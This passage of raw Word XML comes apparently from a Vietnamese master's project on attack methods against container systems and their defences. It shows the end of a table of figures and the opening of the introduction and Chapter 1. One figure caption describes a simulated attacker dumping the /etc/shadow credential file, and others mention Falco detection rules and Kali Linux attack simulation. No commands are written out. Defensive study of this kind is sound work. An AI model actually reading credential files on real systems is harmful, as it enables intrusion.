        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001543 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32803EF8" w14:textId="366D808D"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4" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.16. Quá trình thực hiện scan</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> image với Trivy</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001544 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CFC84E9" w14:textId="1522E67D"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5" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.17. Hình ảnh chứng minh việc áp dụng cấu hình bảo mật PSA</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001545 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E83D028" w14:textId="161122EA"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6" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.18. Cấu hình đảm bảo kiến trúc mạng Zero-Trust</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001546 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21D595EE" w14:textId="6DC2A2D1"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7" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.19. Minh chứng xác thực khả năng phòng thủ của kiến trúc mạng Zero-Trust</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001547 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19E587A2" w14:textId="471135CB"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8" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.20. Thực hiện apply rule Falco nhắm chặn bắt các lệnh nhạy cảm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001548 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1590FFDC" w14:textId="72275560"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49" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.21</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>. Hacker tiến hành dump file /etc/shadow</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001549 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76B462A0" w14:textId="1A6E83FB"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50" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.22. Kết quả aler hiển thị cảnh báo đang có lệnh thực thi nhạy cảm trong Pod web</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001550 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01388DD0" w14:textId="0A921B82"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51" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.23. Thực nghiệm đo kiểm hiệu năng của Worker trong khi bị tấn công</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001551 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71A51770" w14:textId="0BCB9A25"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52" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.24. Thao tác thực hiện giả lậ tấn công trên Kali Linux</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001552 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65810A57" w14:textId="1FC91697" w:rsidR="006522A9" w:rsidRDefault="006522A9">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc236001553" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 4.25. Hiệu xuất đo lường sau khi triển khải các giải pháp bảo vệ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001553 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79CC4C58" w14:textId="329CA5AC" w:rsidR="001620D1" w:rsidRPr="006522A9" w:rsidRDefault="001620D1">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6C0815" w14:textId="66021AD5" w:rsidR="00EB7207" w:rsidRPr="004F7BA7" w:rsidRDefault="00CB2369">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc235976340"/>
      <w:r w:rsidRPr="004F7BA7">
        <w:lastRenderedPageBreak/>
        <w:t>MỞ ĐẦU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="137114ED" w14:textId="35AAA95D" w:rsidR="001430E0" w:rsidRPr="001430E0" w:rsidRDefault="001430E0" w:rsidP="001430E0">
      <w:r w:rsidRPr="001430E0">
        <w:t xml:space="preserve">Trong những năm gần đây, công nghệ container hóa (Containerization) cùng kiến trúc vi dịch vụ (Microservices) đang phát triển thần tốc và trở thành tiêu chuẩn cốt lõi trong hạ tầng công nghệ thông tin hiện đại. Kiến trúc này có thể thấy ở mọi nơi từ hệ thống máy chủ của các doanh nghiệp, dịch vụ điện toán đám mây cho đến các ứng dụng vận hành thực tế. Theo báo cáo thống kê và dự báo từ tổ chức nghiên cứu thị trường danh tiếng </w:t>
      </w:r>
      <w:r w:rsidRPr="001430E0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Gartner</w:t>
      </w:r>
      <w:r w:rsidRPr="001430E0">
        <w:t>, xu hướng dịch chuyển sang nền tảng đám mây phân tán dựa trên container sẽ bùng nổ mạnh mẽ, cụ thể ước tính đến hết năm 2026 sẽ có hơn 90% các tổ chức và doanh nghiệp trên toàn cầu triển khai ứng dụng dưới dạng container hóa trong môi trường sản xuất, tăng trưởng vượt bậc so với tỷ lệ dưới 40% ở giai đoạn đầu thập kỷ</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1973087390"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
            <w:instrText xml:space="preserve"> CITATION Eri24 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [1]</w:t>
          </w:r>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="001430E0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A5756" w14:textId="00DCDFA9" w:rsidR="001430E0" w:rsidRPr="00C254C6" w:rsidRDefault="001430E0" w:rsidP="001430E0">
      <w:r w:rsidRPr="001430E0">
        <w:t>Với việc phát triển bùng nổ về quy mô của các hệ thống container như vậy, vấn đề về đảm bảo an ninh, an toàn thông tin dành cho môi trường này lại được đặt ra và nhận được nhiều sự quan tâm sâu sắc của các nhà khoa học cũng như cộng đồng bảo mật. Đã có một số nghiên cứu được thực hiện nhằm phát hiện các hành vi tấn công mạng nhắm vào cấu phần image, runtime hay hệ điều phối container và cho các kết quả khả quan. Tuy nhiên, các chuyên gia an ninh mạng đang phải đối mặt với thách thức lớn về hiệu năng và khả năng hoạt động trong suốt của các công cụ phát hiện và phòng thủ. Nguyên nhân phổ biến là do bản chất các container trong kiến trúc microservices được thiết kế với độ phức tạp phân rã, yêu cầu tối giản tối đa độ trễ để tối ưu tài nguyên máy chủ. Chính điều này khiến hệ thống container càng dễ trở thành mục tiêu hàng đầu của tin tặc với các kỹ thuật tinh vi như tấn công thoát chuồng, cấu hình sai đặc quyền, hay tấn công mạng nội bộ, đồng thời gây khó khăn cho việc triển khai các giải pháp đảm bảo an ninh an toàn truyền thống vốn tiêu tốn nhiều tài nguyên</w:t>
      </w:r>
      <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC54B31" w14:textId="77777777" w:rsidR="001430E0" w:rsidRPr="001430E0" w:rsidRDefault="001430E0" w:rsidP="001430E0">
      <w:r w:rsidRPr="001430E0">
        <w:t xml:space="preserve">Do đó, học viên thực hiện đề án </w:t>
      </w:r>
      <w:r w:rsidRPr="001430E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Nghiên cứu phương thức tấn công vào hệ thống container”</w:t>
      </w:r>
      <w:r w:rsidRPr="001430E0">
        <w:t xml:space="preserve"> với mục tiêu chỉ ra các véc-tơ đe dọa, thực nghiệm làm rõ cơ chế xâm nhập , từ đó đề xuất giải pháp giám sát và cấu hình phòng thủ hiệu quả, gần như </w:t>
      </w:r>
      <w:r w:rsidRPr="001430E0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">trong suốt và không gây ảnh hưởng tới hiệu năng vận hành thực tế của các thiết bị cũng như máy chủ container. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15616CC4" w14:textId="184FE931" w:rsidR="00704A61" w:rsidRPr="000A54C5" w:rsidRDefault="00704A61" w:rsidP="001430E0">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5928D56D" w14:textId="77777777" w:rsidR="004F7BA7" w:rsidRDefault="004F7BA7">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="417EA44A" w14:textId="77777777" w:rsidR="00B64A44" w:rsidRDefault="00B64A44" w:rsidP="005062A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:sectPr w:rsidR="00B64A44" w:rsidSect="00590974">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
          <w:pgMar w:top="1985" w:right="1134" w:bottom="1701" w:left="1985" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579622A5" w14:textId="2D5ACE77" w:rsidR="004F7BA7" w:rsidRPr="000A54C5" w:rsidRDefault="004F7BA7" w:rsidP="005062A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc235976341"/>
      <w:r w:rsidRPr="004F7BA7">
        <w:lastRenderedPageBreak/>
        <w:t>CƠ SỞ LÝ LUẬN VỀ CÔNG NGHỆ CONTAINER VÀ KIẾN TRÚC HỆ THỐNG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="56D56EEB" w14:textId="43E02CB4" w:rsidR="00314655" w:rsidRPr="009E0111" w:rsidRDefault="009F2546" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc235976342"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4B608A27" w14:textId="39F75855" w:rsidR="00240625" w:rsidRPr="0056158A" w:rsidRDefault="009F2546" w:rsidP="00240625">
      <w:r w:rsidRPr="0056158A">
        <w:t>Chương 1 sẽ tập trung làm rõ các khái niệm cốt lõi về công nghệ container hóa (Containerization), phân tích sự khác biệt mang tính phân tầng hệ thống giữa container và công nghệ máy ảo truyền thống (Virtual Machine). Đồng thời, chương này cũng đi sâu mô tả kiến trúc phân lớp cấu thành nên một hệ sinh thái container điển hình. Cuối cùng, nội dung chương sẽ phân tích chi tiết hai cơ chế bảo mật nền tảng của nhân Linux là Namespaces và Control Groups</w:t>
      </w:r>
      <w:r w:rsidR="00550AE9" w:rsidRPr="0056158A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F3775" w14:textId="44E2C9B2" w:rsidR="009F2546" w:rsidRDefault="009F2546" w:rsidP="00240625">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc235976343"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Tổng quan về công nghệ Container hóa (Containerization)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6C53A728" w14:textId="59C0CA10" w:rsidR="00240625" w:rsidRDefault="00240625" w:rsidP="00240625">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc235976344"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khái niệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2F1BC9D9" w14:textId="254A9FF6" w:rsidR="00EE4545" w:rsidRPr="00503FC1" w:rsidRDefault="00EE4545" w:rsidP="00EE4545">
      <w:r w:rsidRPr="00EE4545">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khái niệm "container" xuất hiện trong nhiều lĩnh vực với các định nghĩa khác nhau. Trong ngành vận tải và logistics, container được hiểu là</w:t>
      </w:r>
      <w:r w:rsidR="00240625">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00240625" w:rsidRPr="00240625">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“là m</w:t>
      </w:r>
      <w:r w:rsidR="00240625" w:rsidRPr="00240625">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ột thùng rỗng bằng kim loại, bên trong có thể chứa nhiều loại hàng hóa khác nhau và được tái sử dụng nhiều lần. Container thường có nhiều kích thước khác nhau phù hợp với từng phương tiện vận chuyển; được thiết kế và làm từ vật liệu rất bền như thép hoặc nhôm nên có khả năng chịu lực tốt, hạn chế được được các tác động của môi trường.”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:id w:val="1123416735"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C254C6">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Ste22 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C254C6">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
            <w:rPr>
              <w:i/>
              <w:iCs/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00175415">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
          <w:r w:rsidR="00C254C6">
            <w:rPr>
              <w:i/>
              <w:iCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00240625" w:rsidRPr="00240625">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Điểm đặc trưng của container vận tải là tính chuẩn hóa về kích thước, giúp nó dễ dàng tương thích với nhiều loại phương tiện khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D3061" w14:textId="32BC552C" w:rsidR="00EE4545" w:rsidRPr="00503FC1" w:rsidRDefault="00EE4545" w:rsidP="00EE4545">
      <w:r>
